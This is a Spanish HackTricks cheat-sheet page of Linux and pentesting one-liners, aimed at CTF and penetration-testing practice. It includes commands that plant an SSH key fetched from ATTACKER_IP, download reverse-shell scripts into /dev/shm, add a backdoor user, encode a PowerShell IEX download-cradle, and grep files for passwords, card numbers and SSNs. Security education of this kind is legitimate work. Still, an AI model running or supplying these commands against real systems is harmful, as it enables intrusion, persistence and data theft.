# Comandos útiles de Linux
\ Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** con las herramientas comunitarias más avanzadas del mundo.\ Obtén acceso hoy mismo: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres que tu **empresa sea anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Obtén el [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com) * **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
## Bash común ```bash #Exfiltration using Base64 base64 -w 0 file #Get HexDump without new lines xxd -p boot12.bin | tr -d '\n' #Add public key to authorized keys curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys #Echo without new line and Hex echo -n -e #Count wc -l #Lines wc -c #Chars #Sort sort -nr #Sort by number and then reverse cat file | sort | uniq #Sort and delete duplicates #Replace in file sed -i 's/OLD/NEW/g' path/file #Replace string inside a file #Download in RAM wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py #Files used by network processes lsof #Open files belonging to any process lsof -p 3 #Open files used by the process lsof -i #Files used by networks processes lsof -i 4 #Files used by network IPv4 processes lsof -i 6 #Files used by network IPv6 processes lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234 lsof +D /lib #Processes using files inside the indicated dir lsof -i :80 #Files uses by networks processes fuser -nv tcp 80 #Decompress tar -xvzf /path/to/yourfile.tgz tar -xvjf /path/to/yourfile.tbz bzip2 -d /path/to/yourfile.bz2 tar jxf file.tar.bz2 gunzip /path/to/yourfile.gz unzip file.zip 7z -x file.7z sudo apt-get install xz-utils; unxz file.xz #Add new user useradd -p 'openssl passwd -1 ' hacker #Clipboard xclip -sel c < cat file.txt #HTTP servers python -m SimpleHTTPServer 80 python3 -m http.server ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" php -S $ip:80 #Curl #json data curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint #Auth via JWT curl -X GET -H 'Authorization: Bearer ' http://host:3000/endpoint #Send Email sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content #DD copy hex bin file without first X (28) bytes dd if=file.bin bs=28 skip=1 of=blob #Mount .vhd files (virtual hard drive) sudo apt-get install libguestfs-tools guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd # ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys ssh-keyscan 10.10.10.101 # Openssl openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server openssl x509 -in ca.cert.pem -text #Read certificate openssl genrsa -out newuser.key 2048 #Create new RSA2048 key openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb) openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox) # If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using: openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12 # Decrypt ssh key openssl rsa -in key.ssh.enc -out key.ssh #Decrypt openssl enc -aes256 -k -d -in backup.tgz.enc -out b.tgz #Count number of instructions executed by a program, need a host based linux (not working in VM) perf stat -x, -e instructions:u "ls" #Find trick for HTB, find files from 2018-12-12 to 2018-12-14 find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null #Reconfigure timezone sudo dpkg-reconfigure tzdata #Search from which package is a binary apt-file search /usr/bin/file #Needed: apt-get install apt-file #Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw #Set not removable bit sudo chattr +i file.txt sudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip 7z l file.zip ```
\ Utilice [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\ Obtenga acceso hoy mismo: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Bash para Windows ```bash #Base64 for Windows echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 #Exe compression upx -9 nc.exe #Exe2bat wine exe2bat.exe nc.exe nc.txt #Compile Windows python exploit to exe pip install pyinstaller wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py #Compile for windows #sudo apt-get install gcc-mingw-w64-i686 i686-mingw32msvc-gcc -o executable useradd.c ``` ## Greps El comando `grep` es una herramienta muy útil en Linux para buscar patrones en archivos de texto. Puede ser utilizado para buscar palabras clave, filtrar líneas que coincidan con un patrón específico y realizar búsquedas avanzadas utilizando expresiones regulares. ### Sintaxis básica La sintaxis básica del comando `grep` es la siguiente: ``` grep [opciones] [patrón] [archivo(s)] ``` - `[opciones]`: se utilizan para especificar opciones adicionales, como la búsqueda recursiva en directorios o la ignorancia de mayúsculas y minúsculas. - `[patrón]`: es el patrón que se desea buscar en el archivo(s). - `[archivo(s)]`: son los archivos en los que se realizará la búsqueda. Si no se especifica ningún archivo, `grep` leerá la entrada estándar. ### Ejemplos de uso 1. Buscar una palabra clave en un archivo: ``` grep "palabra_clave" archivo.txt ``` 2. Buscar una palabra clave en varios archivos: ``` grep "palabra_clave" archivo1.txt archivo2.txt archivo3.txt ``` 3. Buscar una palabra clave en todos los archivos de un directorio (recursivamente): ``` grep -r "palabra_clave" directorio/ ``` 4. Buscar una palabra clave ignorando mayúsculas y minúsculas: ``` grep -i "palabra_clave" archivo.txt ``` 5. Buscar una palabra clave y mostrar el número de línea donde se encuentra: ``` grep -n "palabra_clave" archivo.txt ``` 6. Buscar una palabra clave utilizando una expresión regular: ``` grep -E "expresión_regular" archivo.txt ``` Estos son solo algunos ejemplos básicos de cómo utilizar el comando `grep`. Puedes consultar la página de manual (`man grep`) para obtener más información sobre las opciones y funcionalidades avanzadas de `grep`. ```bash #Extract emails from file grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt #Extract valid IP addresses grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt #Extract passwords grep -i "pwd\|passw" file.txt #Extract users grep -i "user\|invalid\|authentication\|login" file.txt # Extract hashes #Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128}) egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt #Extract valid MySQL-Old hashes grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt #Extract blowfish hashes grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt #Extract Joomla hashes egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt #Extract VBulletin hashes egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt #Extraxt phpBB3-MD5 egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt #Extract Wordpress-MD5 egrep -o '$P$S{31}' *.txt > wordpress-md5.txt #Extract Drupal 7 egrep -o '$S$S{52}' *.txt > drupal-7.txt #Extract old Unix-md5 egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt #Extract md5-apr1 egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt #Extract sha512crypt, SHA512(Unix) egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt #Extract e-mails from text files grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt #Extract HTTP URLs from text files grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt #For extracting HTTPS, FTP and other URL format use grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt #Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex" #Extract Floating point numbers grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt # Extract credit card data #Visa grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt #MasterCard grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt #American Express grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt #Diners Club grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt #Discover grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt #JCB grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt #AMEX grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt # Extract IDs #Extract Social Security Number (SSN) grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt #Extract Indiana Driver License Number grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt #Extract US Passport Cards grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt #Extract US Passport Number grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt #Extract US Phone Numberss grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt #Extract ISBN Numbers egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt ``` ## Ayuda para la búsqueda de Nmap Nmap es una herramienta de escaneo de red muy poderosa y versátil. Aquí hay algunos comandos útiles para ayudarte a aprovechar al máximo Nmap: - `nmap -sn `: Realiza un escaneo de ping para determinar si una dirección IP está activa. - `nmap -sS `: Realiza un escaneo de tipo SYN para determinar los puertos abiertos en una dirección IP. - `nmap -sV `: Realiza un escaneo de versión para determinar la versión y el servicio que se ejecuta en los puertos abiertos de una dirección IP. - `nmap -p `: Escanea puertos específicos en una dirección IP. - `nmap -A `: Realiza un escaneo agresivo que incluye detección de versión, detección de sistema operativo y escaneo de scripts. - `nmap -O `: Intenta determinar el sistema operativo que se ejecuta en una dirección IP. - `nmap -T<0-5> `: Establece el nivel de agresividad del escaneo, donde 0 es el más lento y 5 es el más rápido. - `nmap -v `: Muestra una salida detallada del escaneo. Estos son solo algunos ejemplos de los comandos más comunes que puedes utilizar con Nmap. Recuerda que Nmap es una herramienta muy potente y puede proporcionar mucha información sobre una red, por lo que es importante utilizarla de manera ética y responsable. ```bash #Nmap scripts ((default or version) and smb)) nmap --script-help "(default or version) and *smb*" locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb nmap --script-help "(default or version) and smb)" ``` ## Bash Bash (Bourne Again SHell) es un intérprete de comandos de Unix y un lenguaje de programación de shell. Es el shell predeterminado en la mayoría de las distribuciones de Linux y macOS. Bash proporciona una interfaz de línea de comandos para interactuar con el sistema operativo y ejecutar comandos. ### Comandos básicos - `ls`: lista los archivos y directorios en el directorio actual. - `cd`: cambia el directorio actual. - `pwd`: muestra el directorio de trabajo actual. - `mkdir`: crea un nuevo directorio. - `rm`: elimina archivos y directorios. - `cp`: copia archivos y directorios. - `mv`: mueve o renombra archivos y directorios. - `cat`: muestra el contenido de un archivo. - `grep`: busca patrones en archivos. - `chmod`: cambia los permisos de archivos y directorios. - `chown`: cambia el propietario de archivos y directorios. - `ssh`: inicia una sesión segura en un servidor remoto. - `sudo`: ejecuta un comando con privilegios de superusuario. ### Redirección y tuberías - `>`: redirige la salida de un comando a un archivo. - `>>`: redirige y agrega la salida de un comando a un archivo existente. - `<`: redirige la entrada de un archivo a un comando. - `|`: redirige la salida de un comando a la entrada de otro comando. ### Variables de entorno - `export`: establece una variable de entorno. - `env`: muestra las variables de entorno. - `echo`: muestra el valor de una variable de entorno. ### Comandos de búsqueda y filtrado - `find`: busca archivos y directorios en función de diferentes criterios. - `grep`: busca patrones en archivos. - `sort`: ordena líneas de texto. - `wc`: cuenta líneas, palabras y caracteres en un archivo. - `head`: muestra las primeras líneas de un archivo. - `tail`: muestra las últimas líneas de un archivo. ### Comandos de administración del sistema - `top`: muestra los procesos en ejecución y su uso de recursos. - `ps`: muestra los procesos en ejecución. - `kill`: envía una señal a un proceso. - `shutdown`: apaga o reinicia el sistema. - `ifconfig`: muestra y configura las interfaces de red. - `netstat`: muestra las conexiones de red y las estadísticas. - `ping`: envía paquetes ICMP a un host para verificar la conectividad. - `traceroute`: muestra la ruta que toman los paquetes a través de la red. Estos son solo algunos de los comandos básicos de Bash. Hay muchos más comandos y opciones disponibles que pueden ayudarte a administrar y trabajar con eficacia en un sistema Linux. ```bash #All bytes inside a file (except 0x20 and 0x00) for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done ``` ## Iptables Iptables is a powerful firewall utility for Linux systems. It allows you to configure and manage network traffic by creating rules and chains. With iptables, you can control incoming and outgoing traffic, filter packets based on various criteria, and protect your system from unauthorized access. ### Basic Usage To view the current iptables rules, use the following command: ```bash iptables -L ``` To add a new rule, use the `iptables -A` command followed by the desired options. For example, to allow incoming SSH connections, you can use the following command: ```bash iptables -A INPUT -p tcp --dport 22 -j ACCEPT ``` To delete a rule, use the `iptables -D` command followed by the rule number. For example, to delete the rule at position 3 in the INPUT chain, you can use the following command: ```bash iptables -D INPUT 3 ``` ### Common Options Here are some common options that you can use with iptables: - `-A` (append): Adds a new rule to the end of a chain. - `-D` (delete): Deletes a rule from a chain. - `-I` (insert): Inserts a new rule at a specific position in a chain. - `-p` (protocol): Specifies the protocol of the packet (e.g., tcp, udp). - `--dport` (destination port): Specifies the destination port number. - `-j` (jump): Specifies the target action for the packet (e.g., ACCEPT, DROP). ### Chains Iptables uses chains to organize rules. The three default chains are: - `INPUT`: Handles incoming packets. - `OUTPUT`: Handles outgoing packets. - `FORWARD`: Handles packets that are being routed through the system. You can also create your own custom chains to further organize your rules. ### Conclusion Iptables is a versatile tool for managing network traffic on Linux systems. By understanding its basic usage, common options, and chains, you can effectively configure and secure your system's firewall. ```bash #Delete curent rules and chains iptables --flush iptables --delete-chain #allow loopback iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT #drop ICMP iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP iptables -A OUTPUT -p icmp -j DROP #allow established connections iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #allow ssh, http, https, dns iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT #default policies iptables -P INPUT DROP iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT ```
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Obtén el [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com) * **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
\ Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** con las herramientas comunitarias más avanzadas del mundo.\ Obtén acceso hoy mismo: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}